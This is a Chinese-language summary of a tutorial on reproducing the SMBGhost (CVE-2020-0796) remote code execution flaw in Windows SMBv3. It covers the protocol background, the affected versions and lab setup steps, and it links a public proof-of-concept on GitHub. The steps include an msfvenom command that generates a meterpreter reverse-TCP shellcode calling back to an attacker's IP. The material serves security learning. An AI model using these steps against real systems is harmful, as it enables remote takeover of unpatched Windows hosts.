CVE-2020-0796:微软SMBv3协议RCE漏洞复现分析

需积分: 0 1 下载量 111 浏览量 更新于2024-08-05 收藏 574KB PDF 举报
"CVE-2020-0796涉及的是微软的SMBv3协议中的一个远程代码执行(RCE)漏洞,被称为SMBGhost。这个漏洞允许未经身份验证的远程攻击者向目标系统发送恶意的压缩数据包,从而在目标系统上执行任意代码。该漏洞的影响范围包括多个版本的Windows 10和Windows Server 1903及1909。为了复现这个漏洞,需要准备Kali Linux和Windows 10的虚拟机环境,并使用提供的EXP(PoC)来测试漏洞利用。" **0x01 SMB协议简述** SMB(Server Message Block)协议是一种网络通信协议,主要用于在客户端和服务器之间进行文件共享、打印服务、命名管道通信等操作。它最初由IBM开发,后来成为Microsoft Windows操作系统中的核心组件,被广泛应用于Windows环境的网络通信。 **0x02 漏洞详解** CVE-2020-0796,也称为SMBGhost,是由于SMBv3协议在处理特定的压缩数据包时存在的缺陷导致的。攻击者可以通过构造恶意的数据包触发这个漏洞,进而实现远程代码执行。这个漏洞的严重性在于,它与著名的“永恒之蓝”漏洞类似,都可能被用来发起类似于WannaCry勒索软件那样的大规模攻击,对网络安全构成极大威胁。 **0x03 影响版本** 受到影响的操作系统版本主要包括: - 32位和64位的Windows 10版本1903和1909 - 基于ARM64的Windows 10版本1903和1909 - Windows Server 1903和1909的服务器核心安装版 **0x04 漏洞复现步骤** 1. **环境准备**:搭建Kali Linux和Windows 10的虚拟机环境。可以使用提供的迅雷链接下载Windows 10的ISO镜像进行安装。 2. **EXP获取**:从GitHub仓库(https://github.com/chompie1337/SMBGhost_RCE_PoC)下载漏洞复现的PoC(Proof of Concept)代码,确保运行环境为Python 3。 3. **利用工具**:在Kali虚拟机中启动Metasploit框架,生成shellcode。使用`msfvenom`命令,例如:`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=攻击者的IP LPORT=端口号 -f raw > shellcode.raw`,生成的shellcode将用于注入到目标系统。 请注意,进行此类复现操作应当遵守道德和法律规范,不得用于非法目的,否则可能会承担法律责任。复现漏洞的目的应是为了学习、研究和提升网络安全防护能力。